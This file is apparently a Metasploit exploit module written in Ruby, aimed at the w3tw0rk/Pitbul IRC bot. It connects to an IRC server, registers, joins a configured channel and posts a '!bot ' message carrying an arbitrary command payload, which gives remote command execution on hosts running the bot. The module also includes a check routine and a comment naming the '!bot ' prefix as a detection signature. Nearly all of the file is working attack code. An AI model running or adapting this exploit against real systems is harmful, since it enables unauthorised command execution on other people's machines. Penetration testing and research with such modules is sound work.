Path: blob/master/modules/exploits/multi/misc/w3tw0rk_exec.rb
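##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# IRC-driven command execution against the w3tw0rk / Pitbul IRC bot.
#
# Protocol flow on the raw TCP socket provided by Msf::Exploit::Remote::Tcp:
# register (optional PASS, then NICK/USER) -> JOIN the configured channel ->
# one PRIVMSG to the channel whose text starts with "!bot " -> QUIT.
# Every server reply is collected by #send_msg and matched against IRC
# numeric replies (RFC 2812): 463/464 = registration refused,
# 353/366 = NAMES reply / end of NAMES after a successful JOIN.
#
# NOTE: the strings built with "" and appended via << must stay mutable, so
# do not add a frozen_string_literal magic comment to this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and user options.
  #
  # @param info [Hash] extra module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',
      'Description'    => %q{
        This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.
      },
      'Author'         =>
        [
          'Jay Turla'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '120384' ],
          [ 'EDB', '36652' ]
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'        =>
        [
          [ 'w3tw0rk', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2015-06-04',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        # IRC_PASSWORD is optional; when set it is sent as a plain "PASS" line
        # (see #register). This module sets no transport protection itself.
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ])
  end

  # Marks the module as one that may authenticate (the IRC_PASSWORD option).
  #
  # @return [Boolean] always true
  def post_auth?
    true
  end

  # Connects, registers and joins the channel, then decides from the JOIN
  # response whether a bot advertising itself ("auth" / "logged in") is present.
  #
  # @return [Exploit::CheckCode] Unknown when registration or JOIN fails,
  #   Vulnerable when the bot banner is seen, Safe otherwise
  def check
    connect

    res = register(sock)
    # 463 ERR_NOPERMFORHOST / 464 ERR_PASSWDMISMATCH: the server refused us.
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      disconnect # release the socket on this early exit too
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    # Neither 353 RPL_NAMREPLY nor 366 RPL_ENDOFNAMES came back, so the JOIN
    # did not succeed. (`!res =~ /353/` parses as `(!res) =~ /353/`, which
    # never matches a String, so the original condition could not fire.)
    if res !~ /353/ && res !~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      disconnect
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    # The bot's own chatter in the JOIN response is the only fingerprint used.
    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Writes one IRC message and drains whatever the server sends back.
  #
  # Reads are attempted with a 1-second timeout until get_once returns nil.
  # EOF and timeouts are logged via elog and end the read loop; whatever was
  # collected up to that point is still returned.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @param data [String] raw IRC line(s) to send, including CRLF
  # @return [String] everything read back, possibly empty
  def send_msg(sock, data)
    sock.put(data)
    data = "" # reuse the parameter as the response accumulator
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog(e)
    end

    data
  end

  # Sends the IRC registration sequence: optional PASS, then NICK and USER.
  #
  # A NICK longer than 9 characters is replaced by a random 9-letter one
  # (and reported with print_error). The USER line carries the local source
  # address and the target host as the RFC 2812 user/host fields.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] the server's reply, as collected by #send_msg
  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock, msg)
  end

  # Joins the channel named by the CHANNEL option.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] the server's reply
  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  # Posts the trigger message the bot reacts to.
  #
  # The on-the-wire shape is a channel PRIVMSG whose text begins with
  # "!bot " followed by the command payload; that prefix is the signature to
  # look for in IRC server logs or network captures when hunting for this bot.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] the server's reply
  def w3tw0rk_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  # Sends QUIT without waiting for a reply.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [void]
  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  # Same register -> join sequence as #check, then the trigger message.
  # Each failure path prints an error and returns without sending anything
  # further.
  #
  # @return [void]
  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    # 463 / 464: registration refused by the server.
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      disconnect
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    # Same corrected JOIN check as in #check: bail out when neither 353 nor
    # 366 was received instead of sending the command to a channel we are not in.
    if res !~ /353/ && res !~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      disconnect
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
    w3tw0rk_command(sock)

    quit(sock)
    disconnect
  end
end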